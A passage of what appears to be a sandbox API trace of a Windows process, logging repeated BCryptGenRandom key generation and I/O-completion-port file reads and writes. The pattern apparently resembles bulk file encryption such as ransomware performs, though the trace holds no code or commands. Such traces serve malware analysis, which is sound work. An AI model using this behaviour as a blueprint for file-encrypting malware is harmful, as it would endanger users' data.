CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.942] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0193.943] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.953] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.954] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.954] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.955] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.955] free (_Block=0x3e305b8) [0193.955] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.955] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.955] free (_Block=0x1fa91d0) [0193.955] free (_Block=0x1fa2ed8) [0193.955] free (_Block=0x1fa90b8) [0193.955] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.957] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.962] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.962] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.962] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.963] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.963] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.963] free (_Block=0x3e305b8) [0193.963] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.963] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.964] free (_Block=0x1fa91d0) [0193.964] free (_Block=0x1fa2ed8) [0193.964] free (_Block=0x1fa90b8) [0193.964] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0193.964] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.966] CloseHandle (hObject=0x170) returned 1 [0193.966] free (_Block=0x1ff1e60) [0193.966] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.967] CloseHandle (hObject=0x338) returned 1 [0193.967] free (_Block=0x3d70450) [0193.967] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0193.991] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0193.991] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0193.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0193.991] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0193.991] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0193.991] free (_Block=0x3e305b8) [0193.991] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0193.991] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0193.992] free (_Block=0x1fa91d0) [0193.992] free (_Block=0x1fa2ed8) [0193.992] free (_Block=0x1fa90b8) [0193.992] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0193.992] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0193.995] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0193.999] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.071] WriteFile (in: hFile=0x308, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x6af0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0194.072] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.072] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x354c6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.075] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.077] CloseHandle (hObject=0x2a8) returned 1 [0194.077] free (_Block=0x3df0008) [0194.077] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.093] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xbf81, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.094] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.095] CloseHandle (hObject=0x2a8) returned 1 [0194.095] free (_Block=0x3df0008) [0194.095] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.105] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x581a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.107] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.107] CloseHandle (hObject=0x308) returned 1 [0194.107] free (_Block=0x1ff1e60) [0194.107] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.116] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x696d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.118] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.118] CloseHandle (hObject=0x2a8) returned 1 [0194.119] free (_Block=0x3df0008) [0194.119] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.129] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0194.133] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.134] CloseHandle (hObject=0x308) returned 1 [0194.134] free (_Block=0x1ff1e60) [0194.134] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.144] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xa7a5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0194.146] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.147] CloseHandle (hObject=0x2a8) returned 1 [0194.147] free (_Block=0x3df0008) [0194.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0194.155] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.155] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.155] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0194.156] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.156] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.156] free (_Block=0x3e305b8) [0194.156] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.156] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.156] free (_Block=0x1fa91d0) [0194.156] free (_Block=0x1fa2ed8) [0194.156] free (_Block=0x1fa90b8) [0194.156] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.156] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.161] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.162] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.164] CloseHandle (hObject=0x2a8) returned 1 [0194.165] free (_Block=0x3df0008) [0194.165] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0194.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0194.173] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.173] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.173] free (_Block=0x3e305b8) [0194.173] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.173] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.174] free (_Block=0x1fa91d0) [0194.174] free (_Block=0x1fa2ed8) [0194.174] free (_Block=0x1fa90b8) [0194.174] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.174] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.175] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x57a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.175] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.176] CloseHandle (hObject=0x2a8) returned 1 [0194.176] free (_Block=0x3df0008) [0194.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.183] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.183] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0194.183] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0194.184] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.184] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.184] free (_Block=0x3e305b8) [0194.184] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.184] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.184] free (_Block=0x1fa91d0) [0194.184] free (_Block=0x1fa2ed8) [0194.184] free (_Block=0x1fa90b8) [0194.184] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.189] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.189] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.191] CloseHandle (hObject=0x2a8) returned 1 [0194.192] free (_Block=0x3df0008) [0194.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0194.202] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0194.203] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0194.203] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0194.203] free (_Block=0x3e305b8) [0194.203] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.203] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.203] free (_Block=0x1fa91d0) [0194.203] free (_Block=0x1fa2ed8) [0194.203] free (_Block=0x1fa90b8) [0194.203] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.204] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.208] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.211] CloseHandle (hObject=0x2a8) returned 1 [0194.211] free (_Block=0x3df0008) [0194.211] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0194.225] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.225] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.225] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0194.225] calloc (_Count=0x40, _Size=0x4) returned 0x3e306c0 [0194.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0194.226] free (_Block=0x3e306c0) [0194.226] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0194.226] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0194.226] free (_Block=0x1fa92e8) [0194.226] free (_Block=0x1fa2ed8) [0194.226] free (_Block=0x1fa91d0) [0194.226] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.228] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x6030, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0194.228] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.228] CloseHandle (hObject=0x2a8) returned 1 [0194.229] free (_Block=0x3df0008) [0194.229] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0194.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0194.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0194.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0194.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: 